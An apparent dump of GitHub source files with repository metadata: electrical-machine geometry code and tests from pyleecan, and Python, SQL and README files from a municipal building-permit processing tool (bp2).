node.neighbors\n\t\t\t# go through all neighbour nodes and build a new path\n\t\t\t# if it was never visited, mark it for the visualization\n\t\t\tfor neighbour in neighbours:\n\t\t\t\tif neighbour.color == WHITE:\n\t\t\t\t\tneighbour.make_closed()\n\t\t\t\tnew_path = list(path)\n\t\t\t\t#append the new element to the existing path\n\t\t\t\tnew_path.append(neighbour)\n\t\t\t\tqueue.append(new_path)\n\n\t\t\t\tif neighbour == end:\n\t\t\t\t\t#return new_path\n\t\t\t\t\tdraw_path(draw, new_path, start, end)\n\t\t\t\t\treturn None\n\t\t\t# mark node as explored\n\t\t\texplored.append(node)\n\t\tdraw()\n```\n"
}
] | 8 |
HugoBecuwe/pyleecan
|
https://github.com/HugoBecuwe/pyleecan
|
ba3d16cb77680c0f4b5c71e99c74210f4ea85e86
|
1ae19ca1777fc186431d9a35bb01332fb936f0b5
|
0131615d443dead0ad58a9fb3756635bd246b26c
|
refs/heads/master
| 2023-08-15T18:19:53.599865 | 2021-10-12T12:02:59 | 2021-10-12T12:02:59 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5413142442703247,
"alphanum_fraction": 0.5783994793891907,
"avg_line_length": 27.462963104248047,
"blob_id": "e8df7ee24f9c1e42422d180e506d2ceb7529d823",
"content_id": "fefd8ba3e7ed0511f13c75bf2798830b5b960d71",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1537,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 54,
"path": "/Tests/Methods/Machine/test_comp_periodicity.py",
"repo_name": "HugoBecuwe/pyleecan",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom os.path import join\n\nfrom pyleecan.Functions.load import load\nfrom pyleecan.definitions import DATA_DIR\n\nmachine_list = [\n [\"Toyota_Prius\", (4, True, 4, True)],\n [\"BMW_i3\", (6, True, 6, True)],\n [\"Protean_InWheel\", (8, False, 32, True)],\n [\"Tesla_S\", (2, False, 2, False)],\n [\"Audi_eTron\", (2, False, 2, False)],\n [\"Benchmark\", (1, True, 5, True)],\n [\"SCIM_001\", (1, True, 1, True)],\n [\"SCIM_006\", (2, True, 2, True)],\n [\"SPMSM_001\", (4, False, 4, True)],\n [\"SPMSM_003\", (1, True, 1, True)],\n [\"SPMSM_015\", (9, False, 9, True)],\n [\"SIPMSM_001\", (1, False, 2, True)],\n [\"SynRM_001\", (2, True, 2, True)],\n [\"LSRPM_001\", (4, False, 4, True)],\n]\n\n\[email protected]\[email protected](\"machine\", machine_list)\ndef test_comp_periodicity(machine):\n\n machine_obj = load(join(DATA_DIR, \"Machine\", machine[0] + \".json\"))\n\n # per_a, aper_a = machine_obj.comp_periodicity_spatial()\n\n # per_t, aper_t, _, _ = machine_obj.comp_periodicity_time()\n\n per_a, aper_a, per_t, aper_t = machine_obj.comp_periodicity()\n\n msg = (\n \"Wrong periodicity calculation for \"\n + machine_obj.name\n + \": \"\n + str((per_a, aper_a, per_t, aper_t))\n )\n assert (per_a, aper_a, per_t, aper_t) == machine[1], msg\n\n return (per_a, aper_a, per_t, aper_t)\n\n\n# To run it without pytest\nif __name__ == \"__main__\":\n\n per_tuple = test_comp_periodicity(machine_list[-1])\n\n for machine in machine_list:\n per_tuple = test_comp_periodicity(machine)\n"
},
{
"alpha_fraction": 0.5241530537605286,
"alphanum_fraction": 0.5373274683952332,
"avg_line_length": 32.914894104003906,
"blob_id": "cc63c29944c99cc18e6f6aadb01b3c1be9a6d3d8",
"content_id": "becb87e1a162ad30d40f65d2dc93c13bddc9fd3f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3188,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 94,
"path": "/pyleecan/Functions/Geometry/transform_hole_surf.py",
"repo_name": "HugoBecuwe/pyleecan",
"src_encoding": "UTF-8",
"text": "from numpy import pi, exp\nfrom ...Functions.labels import (\n update_RTS_index,\n decode_label,\n BOUNDARY_PROP_LAB,\n YSR_LAB,\n YSL_LAB,\n)\n\n\ndef transform_hole_surf(hole_surf_list, Zh, sym, alpha, delta, is_split=False):\n \"\"\"Take a list of surface for a single hole and apply the\n transformation (rotate, translate, duplicate)\n\n Parameters\n ----------\n surf_list : list\n List of the surface to edit (single hole)\n sym : int\n Symetry to apply 2 = half the machine (Default value = 1 => full machine)\n alpha : float\n Angle for rotation (Default value = 0) [rad]\n delta : complex\n Complex for translation (Default value = 0)\n is_stator : bool\n True if ventilation is on the stator and 0 on the rotor (Default value = True)\n is_split : bool\n When sym>1, call surf.split_line to cut the surfaces\n\n Returns\n -------\n surf_list: list\n A list of transformed surface\n \"\"\"\n\n assert Zh % sym == 0\n\n # Rotate/translate\n if alpha != 0 or delta != 0:\n for surf in hole_surf_list:\n surf.rotate(alpha)\n surf.translate(delta)\n\n # Duplicate to have Zh/sym all the hole surfaces\n surf_list = list()\n for ii in range(Zh // sym):\n for surf in hole_surf_list:\n new_surf = surf.copy()\n new_surf.rotate(ii * 2 * pi / Zh)\n # Update label like \"Rotor-0_HoleVoid_R0-T0-S0\"\n new_surf.label = update_RTS_index(label=new_surf.label, S_id=ii)\n surf_list.append(new_surf)\n\n # Split the surfaces for symmetry\n if is_split and sym > 1:\n # Add an extra surface for each cut (alpha0 > 0)\n for surf in hole_surf_list:\n last_surf = surf.copy()\n last_surf.rotate((ii + 1) * 2 * pi / Zh)\n # Update label like \"Rotor-0_HoleVoid_R0-T0-S0\"\n last_surf.label = update_RTS_index(label=last_surf.label, S_id=ii + 1)\n surf_list.append(last_surf)\n\n first_surf = surf.copy()\n first_surf.rotate((Zh - 1) * 2 * pi / Zh)\n # Update label like \"Rotor-0_HoleVoid_R0-T0-S0\"\n first_surf.label = update_RTS_index(label=first_surf.label, S_id=Zh - 1)\n surf_list.append(first_surf)\n\n cut_list = list()\n lam_label = decode_label(new_surf.label)[\"lam_label\"]\n for surf in surf_list:\n # Cut Ox axis\n top, _ = surf.split_line(\n 0,\n 100,\n is_join=True,\n prop_dict_join={BOUNDARY_PROP_LAB: lam_label + \"_\" + YSR_LAB},\n )\n if top is not None and sym > 2:\n # Cut O-\"sym angle\" axis\n _, bot = top.split_line(\n 0,\n 100 * exp(1j * 2 * pi / sym),\n is_join=True,\n prop_dict_join={BOUNDARY_PROP_LAB: lam_label + \"_\" + YSL_LAB},\n )\n if bot is not None:\n cut_list.append(bot)\n elif top is not None: # Half the machine => Only one cut required\n cut_list.append(top)\n surf_list = cut_list\n\n return surf_list\n"
}
] | 2 |
MSLADevServGIS/bp2
|
https://github.com/MSLADevServGIS/bp2
|
810497cf62322bc4824ee85b37f254950c295a86
|
17817ee17d4853fcbbd6843f489b675570fb95d6
|
4bfd6c8d305681e123b21c834ae746f2cee2faee
|
refs/heads/master
| 2021-01-13T02:52:10.492875 | 2017-02-13T23:12:55 | 2017-02-13T23:12:55 | 77,092,379 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5586915612220764,
"alphanum_fraction": 0.5625994801521301,
"avg_line_length": 34.6134033203125,
"blob_id": "77006edf51a1b1fa19c8056c89fda27d4164397e",
"content_id": "c2558056cdd5de18464b2da26568829b8cb4f1af",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6909,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 194,
"path": "/testing.py",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "\"\"\"\npermits.py -- Building Permit Database Script\nAuthor: Garin Wally; April-July 2016\n\n--NEW--\n\"\"\"\n\nimport os\nfrom glob import glob\n\n\nimport defopt\nfrom usaddress import parse as addrparse\n\nimport aside\nimport dslw\nimport dslw.arcio\n\nos.chdir(r\"I:\\WallyG\\projects\\bp2\")\nimport app\n\n\n# =============================================================================\n# DATA PATHS\n\nparcels = r\"Database Connections\\gisrep.sde\\gisrep.SDE.Parcels\\gisrep.SDE.Parcels\"\ncondos = r\"Database Connections\\gisrep.sde\\gisrep.SDE.Parcels\\gisrep.SDE.All_Condos\"\nannex = r\"Database Connections\\gisrep.sde\\gisrep.SDE.AdministrativeArea\\gisrep.SDE.Annexations\"\nnhoods = r\"Database Connections\\gisrep.sde\\gisrep.SDE.AdministrativeArea\\gisrep.SDE.NH_Council_Boundaries\"\nufda = r\"I:\\ArcExplorer\\Data\\Planning_to_sde.gdb\\Mt_St_Plane\\UFDA_regions\"\naddrs = r\"I:\\ArcExplorer\\Data\\Structures\\Address.gdb\\AddrsFt\"\n\n\n# =============================================================================\n# DATA (No touching)\n\n# Path to database for storing copies from SDE, etc.\nSDE_DATA = \"data/sde_data.sqlite\"\n\n# Global srid to reproject to; QGIS-friendly\nSRID = 2256\ndata = [\n {\"path\": parcels, \"name\": \"parcels\"},\n {\"path\": condos, \"name\": \"condos\"}, # TODO: dissolve?\n {\"path\": annex, \"name\": \"annexations\"},\n {\"path\": nhoods, \"name\": \"nhoods\"},\n {\"path\": ufda, \"name\": \"ufda_regions\"},\n {\"path\": addrs, \"name\": \"addrs\"}\n ]\n# Names correlate with table names in .sql scripts\n\n\nclass Processor(object):\n def __init__(self, year):\n self.year = year\n # Set base directory\n self.base_dir = \"data/{year}\".format(year=year)\n # Get report file path\n self.city_rpts = [os.path.abspath(f).replace(\"\\\\\", \"/\") for f in\n glob(\"{base}/city_{year}.xlsx\".format(\n base=self.base_dir, year=self.year))]\n # Set db path\n self.db = os.path.join(self.base_dir, \"bp{year}.sqlite\".format(\n year=self.year))\n # Create db\n aside.nix.write(\"Create/Connect to db\")\n self.conn = dslw.SpatialDB(self.db, verbose=False)\n self.cur = self.conn.cursor()\n aside.nix.ok()\n\n def prepare_city(self):\n \"\"\"Get report by year, process, load into SQLite db.\n\n Args:\n year (int): the year to process.\n \"\"\"\n self.juris = \"City\"\n # Process; returns output path\n aside.nix.write(\"Process XLSX\")\n self.out_csv = app.processing.city(self.city_rpts[0])\n aside.nix.ok()\n # Get name (e.g. 'city_2016_processed')\n self.table_name = os.path.basename(self.out_csv).split(\".\")[0]\n aside.nix.info(\"Table: \" + self.table_name)\n\n # Load csv to db\n aside.nix.write(\"Insert CSV\")\n dslw.csv2lite(self.conn, self.out_csv)\n aside.nix.ok()\n\n def spatialize(self):\n # Add notes column\n aside.nix.write(\"Spatialize permits\")\n self.cur.execute(\"ALTER TABLE {} ADD COLUMN notes TEXT\".format(\n self.table_name))\n # Backup\n clone_q = \"SELECT CloneTable('main', '{0}', '{0}_bk', 1)\"\n self.cur.execute(clone_q.format(self.table_name))\n # Attach spatial db\n self.cur.execute(\"ATTACH DATABASE '{}' AS sde_data;\".format(\n SDE_DATA))\n # Spatialize\n app.spatialize_script(self.conn, self.table_name, SRID)\n\n # Special detail for Townhome/Condo points or for when the parcel data\n # or address data hasn't been updated just yet.\n null_qry = \"SELECT address, geocode FROM {tbl} WHERE geometry IS NULL\"\n null_qry = null_qry.format(tbl=self.table_name)\n update_q = (\"UPDATE {tbl} \"\n \"SET notes = 'TH/C', \"\n \"geometry = (\"\n \" SELECT ST_Multi(geometry) \"\n \" FROM addrs a \"\n \" WHERE a.addnum = {addrnum} AND a.roadname = '{road}') \"\n \"WHERE geometry IS NULL AND geocode = '{geocode}'\")\n nulls = self.cur.execute(null_qry).fetchall()\n # Process only if the query returns non-None values\n if any([r[0] for r in nulls]):\n for row in nulls:\n # Parse each address into a tuple\n parsed = addrparse(row[0])\n # Convert the tuple into a dictionary (reverse)\n d = {v: k for k, v in dict(parsed).iteritems()}\n # Format the update statement using the parsed information\n update = update_q.format(\n tbl=self.table_name, addrnum=d[\"AddressNumber\"],\n road=d[\"StreetName\"], geocode=row[1])\n # Execute the update statement\n self.cur.execute(update)\n # Check again for NULL geometries\n nulls = self.cur.execute(null_qry).fetchall()\n null_df = dslw.utils.Fetch(self.cur).as_dataframe()\n if len(null_df) > 0:\n aside.nix.fail()\n print(\"\\n{} geometries are NULL\".format(len(null_df)))\n print(null_df)\n print(\"\\nSee README about overriding values\")\n else:\n aside.nix.ok()\n\n def calc_density(self):\n # Density\n self.density_table = \"density{}\".format(self.year)\n aside.nix.write(\"Calculate 'density<year>' table\")\n with open(\"app/density.sql\", \"r\") as script:\n density_sql = script.read()\n density = density_sql.format(\n tbl=self.table_name, year=self.year, srid=SRID)\n self.cur.execute(density).fetchall()\n aside.nix.ok()\n\n def summarize(self):\n # Summarize\n aside.nix.write(\"Create 'summary' table\")\n with open(\"app/summarize.sql\", \"r\") as script:\n summarize_sql = script.read()\n summarize = summarize_sql.format(\n tbl=self.density_table, juris=self.juris)\n self.cur.execute(summarize).fetchall()\n aside.nix.ok()\n\n print(\"\")\n check_sum = (\"SELECT jurisdiction, tot_dwellings, sd, dup_units, md_units \"\n \"FROM summary\")\n df = dslw.utils.Fetch(self.cur.execute(check_sum)).as_dataframe()\n print(df)\n print(\"\")\n total = sum([df[\"sd\"].ix[0],\n df[\"dup_units\"].ix[0],\n df[\"md_units\"].ix[0]])\n if df[\"tot_dwellings\"].ix[0] != total:\n aside.nix.warn(\"Total does not match\")\n aside.status.custom(\"COMPLETE\", \"cyan\")\n\n def process_city(self):\n self.prepare_city()\n self.spatialize()\n self.calc_density()\n self.summarize()\n\n\ndef process_city(year):\n \"\"\"Get report by year, process, load into SQLite db.\n\n Args:\n year (int): the year to process.\n \"\"\"\n p = Processor(year)\n p.process_city()\n return\n\nif __name__ == \"__main__\":\n y = int(raw_input(\"What year of permit data? \"))\n process_city(y)\n"
},
{
"alpha_fraction": 0.7266602516174316,
"alphanum_fraction": 0.7420596480369568,
"avg_line_length": 42.33333206176758,
"blob_id": "2360c3beb628d7fbbb89bc0493e692e2c8cd7930",
"content_id": "83c3dfcb9255bb36f35bdeb8571ef87b4431ef56",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1039,
"license_type": "permissive",
"max_line_length": 209,
"num_lines": 24,
"path": "/README.md",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "# bp2.py\n\nThis is the second attempt at making an automatic building permit processor.\n\n# Use (currently working)\n\n1. Download the permit data from [here](http://cpdbprod/ReportServer/Pages/ReportViewer.aspx?%2fLand%2fStatistics%2fNew+Construction+Report&rs:Command=Render) and save to `/data/<year>` as `city_<year>.xlsx` \n2. Open the command line in the bp2 directory \n3. Enter `python bp2.py get_data --replace` to update data from SDE (This takes ~30 min) \n4. Enter `python bp2.py process_city <year>` to process the downloaded Excel file \n5. Profit \n\n## Features to come\n\n* Output tables: `permits` (n features/parcel) and `new_units` (1 feature/parcel; allows for density) \n* Installation using `setup.py` \n* a `process_county` option \n* export to .json and .shp\n* a `report` option to generate reports using HTML templates and graphs \n\n# Rules\nBuilding permits must have >0 unit(s) \nBNCON is an \"other\" building type that may/may not include new units \nBAARC is a \"remodel\" building type that may/may not include new units"
},
{
"alpha_fraction": 0.6128133535385132,
"alphanum_fraction": 0.6142061352729797,
"avg_line_length": 22.933332443237305,
"blob_id": "32c1cef7651dbeaf659c40ddac66d2ae8fb2538a",
"content_id": "07185e668bb3ce1ea1264ac9eab57ddb3755e202",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 718,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 30,
"path": "/app/__init__.py",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport processing\n\n\ndef spatialize_script(conn, table, srid):\n \"\"\"Matches permits to geocodes using parcels/address data.\"\"\"\n _c = conn.cursor()\n _c.execute(open(\"app/spatialize.sql\", \"r\").read().format(\n table=table, srid=srid))\n _c.fetchall()\n #with open(\"app/spatialize.sql\", \"r\") as content:\n # script = content.read()\n #script = script.format(table=table, srid=srid)\n #_c.execute(script)\n return\n\n\n'''\nwith open(\"spatialize.sql\", \"r\") as ss:\n spatialize_script = ss.read()\n\nwith open(\"density.sql\", \"r\") as ds:\n density_script = ds.read()\n\nwith open(\"\", \"r\") as rs:\n region_summary_script = rs.read()\ndel ss, ds, rs\n'''\n"
},
{
"alpha_fraction": 0.6847188472747803,
"alphanum_fraction": 0.7023111581802368,
"avg_line_length": 27.702970504760742,
"blob_id": "dd01433d1551e50df3d4106e74ebc391bb57e1fe",
"content_id": "1a0046df1627a7a92da11641f36728ae3a36c4d2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 2899,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 101,
"path": "/app/region_summary.sql",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "/* Region Summary Report\nInputs:\n{0}: year\n{1}: aggregation feature\n{2}: aggregation feature's name field\n\nOutputs:\nCreates the region summary tables (_rs<year>) for the input year's single family, duplex, and multi\nfamily units by input aggregation field.\n*/\n\n/* Analysis for Mike -- Model Validation\n-- All Multidwelling Development by Nhood\nCREATE TABLE all_multidev (nhood_name TEXT, sum_dwellings INTEGER);\n-- Populate table\nINSERT INTO all_multidev\n SELECT name, sum(sum_dwellings) AS sum_dwellings FROM (\n\n -- Copy/paste this for individual projects\n SELECT d.address AS address, SUM(d.sum_dwellings) AS sum_dwellings, n.name AS name \n FROM density2014 d \n JOIN council_dists n ON Intersects(d.geometry, n.geometry) \n WHERE d.sum_dwellings >= 3 \n\tGROUP BY d.address\n\n UNION \n\n SELECT d.address AS address, SUM(d.sum_dwellings) AS sum_dwellings, n.name AS name \n FROM density2015 d \n JOIN council_dists n ON Intersects(d.geometry, n.geometry) \n WHERE d.sum_dwellings >= 3 \n\tGROUP BY d.address\n\n UNION \n\n SELECT d.address AS address, SUM(d.sum_dwellings) AS sum_dwellings, n.name AS name \n FROM density2016 d \n JOIN council_dists n ON Intersects(d.geometry, n.geometry) \n WHERE d.sum_dwellings >= 3 \n\tGROUP BY d.address\n\n ORDER BY n.name\n) \n GROUP BY name;\n*/\n\n-- Recreated the anlaysis for Mike to be more useful/modular\nCREATE TABLE multi_rs{0} (nhood_name TEXT, sum_dwellings INTEGER);\n-- Populate table\nINSERT INTO multi_rs{0}\n SELECT name, sum(sum_dwellings) AS sum_dwellings FROM (\n SELECT d.address AS address, SUM(d.sum_dwellings) AS sum_dwellings, n.{2} AS name \n FROM density{0} d \n JOIN {1} n ON Intersects(d.geometry, n.geometry) \n WHERE d.sum_dwellings >= 3 \n\tGROUP BY d.address\n\tORDER BY n.{2}\n\t)\n GROUP BY name;\n\n/* All multidev for a series of years\nSELECT nhood_name, SUM(sum_dwellings) FROM (\n SELECT * FROM multidev2014\n UNION\n SELECT * FROM multidev2015\n UNION\n SELECT * FROM multidev2016\n )\n GROUP BY nhood_name;\n*/\n\n-- Same thing, but for single family residences (sfr)\nCREATE TABLE sfr_rs{0} (nhood_name TEXT, sum_dwellings INTEGER);\n\nINSERT INTO sfr_rs{0}\n SELECT name, SUM(sum_dwellings) AS sum_dwellings FROM (\n\n SELECT d.address AS address, SUM(d.sum_dwellings) AS sum_dwellings, n.{2} AS name \n FROM density{0} d\n JOIN {1} n ON Intersects(d.geometry, n.geometry) \n WHERE d.sum_dwellings = 1 \n\tGROUP BY d.address\n\tORDER BY n.{2}\n ) \n GROUP BY name;\n\n\n-- And for duplexes\nCREATE TABLE duplex_rs{0} (nhood_name TEXT, sum_dwellings INTEGER);\n\nINSERT INTO duplex_rs{0}\n SELECT name, SUM(sum_dwellings) AS sum_dwellings FROM (\n\n SELECT d.address AS address, SUM(d.sum_dwellings) AS sum_dwellings, n.{2} AS name \n FROM density{0} d \n JOIN {1} n ON Intersects(d.geometry, n.geometry) \n WHERE d.sum_dwellings = 2 \n\tGROUP BY d.address\n\tORDER BY n.{2}\n ) \n GROUP BY name;\n"
},
{
"alpha_fraction": 0.5424301028251648,
"alphanum_fraction": 0.551591157913208,
"avg_line_length": 23.11627960205078,
"blob_id": "1bbc55e9481d616ee381cfe9029b1a34275caa7a",
"content_id": "b93d358bf336514312d47522f0dbba46bab5b50d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 2074,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 86,
"path": "/app/summarize.sql",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "/*\nsummarize.sql -- Creates and enters building permit summary data into a new\ntable 'summary'.\n\nFormatting Parameters:\n{tbl}: table to summarize\n{juris}: jurisdiction of summarzing table\n*/\n\n-- Create summary table\nCREATE TABLE IF NOT EXISTS summary (\n jurisdiction TEXT PRIMARY KEY,\n tot_permits INT,\n tot_dwellings INT,\n sd INT,\n dup_units INT,\n dup_permits INT,\n md_units INT,\n md_permits INT\n);\n\n\n-- Insert City\nINSERT OR IGNORE INTO summary VALUES ('city', 0, 0, 0, 0, 0, 0, 0);\n\n\n-- Insert County\nINSERT OR IGNORE INTO summary VALUES ('county', 0, 0, 0, 0, 0, 0, 0);\n\n\n-- Update row by jurisdiction field in 'summary' table\nUPDATE \n summary \nSET \n -- Total Permits\n tot_permits = (\n SELECT COUNT(DISTINCT permit_number)\n FROM {tbl}),\n -- Total Dwellings\n tot_dwellings = (\n SELECT SUM(dwellings) FROM (\n SELECT dwellings\n FROM {tbl}\n GROUP BY permit_number)\n ),\n -- Sum Single Dwellings (SDs) \n sd = (\n SELECT SUM(dwellings) FROM (\n SELECT dwellings\n FROM {tbl}\n GROUP BY permit_number\n HAVING SUM(dwellings) = 1)\n ),\n -- Sum Duplexes\n dup_units = (\n SELECT SUM(dwellings) \n FROM (\n SELECT *\n FROM {tbl}\n GROUP BY permit_number\n HAVING dwellings = 2)\n ),\n -- Number of Dup permits\n dup_permits = (\n SELECT COUNT(permit_number)\n FROM (\n SELECT *\n FROM {tbl}\n GROUP BY permit_number\n HAVING dwellings = 2)),\n -- Sum Multidwellings\n md_units = (\n SELECT SUM(dwellings) FROM (\n SELECT dwellings\n FROM {tbl}\n GROUP BY permit_number\n HAVING SUM(dwellings) >= 3)\n ),\n -- Number of MD permits\n md_permits = (\n SELECT COUNT(permit_number) FROM (\n SELECT *\n FROM {tbl}\n GROUP BY permit_number\n HAVING dwellings >= 3))\nWHERE jurisdiction = LOWER('{juris}');\n"
},
{
"alpha_fraction": 0.5931598544120789,
"alphanum_fraction": 0.5985102653503418,
"avg_line_length": 33.66181945800781,
"blob_id": "24dd47103768a6beb3abb3bf9f4a1241852ff5a8",
"content_id": "55fc9355ad5bd193b6d4b0deb9bd8a275de63e58",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9532,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 275,
"path": "/app/processing.py",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport pandas as pd\n\n\n# =============================================================================\n# VARS\n\n# Output reports\n#CITY_OUT = \"data/city_permits/processed/city_res{}.csv\"\nOUTPUT_NAME = \"data/{year}/{name}_processed.csv\"\n# com_report = \"com{}.csv\"\n# pub_report = \"pub{}.csv\"\n\n# All construction permit codes\nres_codes = {\n 'BNMRA': \"New Multifamily 3-4 Units\",\n 'BNMRB': \"New Multifamily 5+ Units\", # Technically COM permit\n 'BNCON': \"New Other\", # Mixed use\n 'BNRDX': \"New Duplex\",\n 'BNSFR': \"New Single Family Residence\",\n 'BNSFT': \"New Single Family Townhouse\",\n 'BNROS': \"New Shelter/Dorm/Etc\",\n 'BAARC': \"Add/Alter/Remodel Commercial\",\n '': \"None specified\",\n 'None': \"None specified\"\n }\n\ncom_codes = {\n 'BNCON': \"New Other\", # Mixed use, see res_codes\n 'BNCOP': \"New Office/Bank/Professional Building\",\n 'BNCSC': \"New Store/Customer Service\",\n 'BNCSS': \"New Service Station/Repair Garage\",\n 'BNCID': \"New Industrial\",\n 'BNRHM': \"New Hotel/Motel/Cabin\",\n 'BO/S/C': \"Other Commercial\"\n }\n\npub_codes = {\n 'BNCCR': \"New Church/Religious Building\",\n 'BNCHI': \"New Hospital/Institution\",\n 'BNCPG': \"New Parking Garage\",\n 'BNCPW': \"New Public Works Facility\",\n 'BNCSE': \"New Education\",\n 'BNCSR': \"New Recreation\"\n }\n\n\n# =============================================================================\n# COUNTY VARIABLES\n\nCNTY_OUT = \"data/county_permits/processed/cnty_res{}.csv\"\n\nCITIES = [\"missoula\", \"bonner\"] # TODO: Lolo, French Town, Piltzville???\n\nUNITS = {\n \"sfr\": 1,\n \"sf\": 1,\n \"single\": 1,\n \"duplex\": 2,\n \"multi\": \"???\"\n }\n\nRENAMED_COLUMNS = {\n \"Permit Id\": \"permit_number\",\n \"Geo Code\": \"geocode\",\n \"Issued Date\": \"permit_issued_date\",\n \"Property Address\": \"address\",\n \"Type Of Work\": \"permit_type\",\n \"Description\": \"description\",\n \"Property City\": \"city\"\n }\n\nORDERED_COLUMNS = [\n \"permit_number\",\n \"geocode\",\n \"permit_issued_date\",\n \"address\",\n \"dwellings\",\n \"permit_type\",\n \"description\",\n \"city\"\n ]\n\n# NOTE: \"(?i)\" is the regular expression for case independant\nDESC_KEYWORDS = re.compile(\"(?i)\" + \"|\".join(k for k in UNITS.keys()))\n\nNA_VALUES = [\"na\", \"n/a\", \"NA\", \"N/A\", \"nan\"]\n\n\ndef calc_units(x):\n if re.findall(DESC_KEYWORDS, x):\n return UNITS[re.findall(DESC_KEYWORDS, x)[0].lower()]\n else:\n return 0\n\n\n# =============================================================================\n# PROCESSING FUNCTIONS\n\ndef city(all_permits):\n \"\"\"Cleans, preps, and exports building permit reports.\"\"\"\n # Open raw constuction-permit report as DataFrame 'all_const'\n in_name = os.path.basename(all_permits).split(\".\")[0]\n all_const = pd.read_excel(all_permits)\n\n # =========================================================================\n # CLEAN\n\n # Drop columns with all NULL values\n all_const.dropna(axis=1, how='all', inplace=True)\n\n # Rename cols from values in row 3: lowercase and replace spaces with \"_\"\n all_const.columns = all_const.ix[3].apply(\n lambda x: x.lower().replace(\" \", \"_\"))\n\n # Shorten 'dwellings' column name\n # NOTE: units are not always dwellings\n # (e.g. carport with 2 units means 2 cars)\n all_const.rename(columns={\"number_of_dwellings\": \"dwellings\"},\n inplace=True)\n\n # Rename index column 'ix'\n all_const.columns.name = 'ix'\n\n # Drop rows 0-3 which are just headings\n all_const.drop([0, 1, 2, 3], inplace=True)\n\n # Rename subtype column to permit_type\n all_const.rename(columns={\"subtype\": \"permit_type\"},\n inplace=True)\n # Remove Subtype field descriptions\n all_const['permit_type'].fillna(\"None\", inplace=True)\n all_const['permit_type'] = all_const['permit_type'].apply(\n lambda x: x.split(\" \")[0])\n\n # Dwellings\n # Convert NULL dwellings to 0\n all_const['dwellings'].fillna(0, inplace=True)\n # Convert Dwellings to integer\n all_const['dwellings'] = all_const['dwellings'].apply(lambda x: int(x))\n # Drop all rows with 0 dwelling units\n all_const = all_const[all_const.dwellings != 0]\n\n # Convert NULL addresses to \"\"\n all_const['address'].fillna(\"\", inplace=True)\n\n # Convert Geocode to text\n all_const['geocode'] = all_const['geocode'].apply(lambda x: str(x))\n\n # Add City column to improve geocoding results -- not used anymore\n all_const[\"city\"] = \"Missoula\"\n\n # Select all records that don't have 'MSTR' in the address\n all_const = all_const[~all_const.address.str.contains(\"MSTR\")]\n\n # Sort data\n all_const = all_const.sort_values(by=[\"permit_number\", \"address\", \"dwellings\"])\n\n # =========================================================================\n # GET PERMIT YEAR / ADD YEAR TO OUTPUT REPORT\n\n years = set()\n all_const[\"permit_issued_date\"].apply(lambda x: years.add(x.year))\n assert len(years) == 1, \\\n \"Input data shall only consist of one calendar year\"\n\n year = years.pop()\n\n # =========================================================================\n # GENERATE REPORTS\n\n # Create DataFrames for each group of building codes\n '''\n res_const = all_const[(all_const['subtype'].isin(res_codes.keys())) &\n (all_const['dwellings'] > 0)]\n '''\n # Residential Permit Query\n res_const = all_const[\n (all_const[\"permit_type\"].isin(res_codes.keys()))\n ].groupby([\"permit_number\", \"geocode\"]).first().reset_index()\n '''\n # Get permits with >= 3 units filed as commercial\n ((all_const[\"dwellings\"] >= 3) &\n (all_const[\"construction_type\"] == \"Commercial Construction\") &\n (all_const[\"permit_type\"].isin(res_codes.keys()))) |\n # Get residential construction of only listed subtypes and\n # dwellings >= 1\n ((all_const[\"permit_type\"].isin(res_codes.keys()) &\n all_const[\"dwellings\"] >= 1))\n # Finally, groupby permit number, remove duplicates and fix index col\n # ].groupby(\"permit_number\").first().reset_index()\n ].groupby([\"permit_number\", \"geocode\"]).first().reset_index()\n '''\n # TODO: maybe make reports for other construction types too?\n '''\n com_const = all_const[all_const['subtype'].isin(com_codes.keys())]\n pub_const = all_const[all_const['subtype'].isin(pub_codes.keys())]\n '''\n # Export\n #res_out = res_const.groupby('permit_number').first().reset_index()\n # res_out.to_excel(res_report, index=False)\n fname = OUTPUT_NAME.format(year=year, name=in_name)\n res_const.to_csv(fname, index=False)\n\n '''\n com_out = com_const.groupby('permit_number').first().reset_index()\n com_out.to_excel(com_report, index=False)\n\n pub_out = pub_const.groupby('permit_number').first().reset_index()\n pub_out.to_excel(pub_report, index=False)\n '''\n return fname\n\n\ndef county_permits(permits, out=True):\n \"\"\"Processes County building permits in the Odyssey-system format.\"\"\"\n # Only accept XLSX files\n if not permits.lower().endswith(\".xlsx\"):\n raise IOError(\"Input must be manually cleaned and converted to XLSX\")\n # Get year from filename\n year = re.findall(\"\\d+\", permits)[0]\n # Read the data\n df = pd.read_excel(permits)\n # Convert NA_VALUES to real NaN (technically a pandas subclass of float)\n df 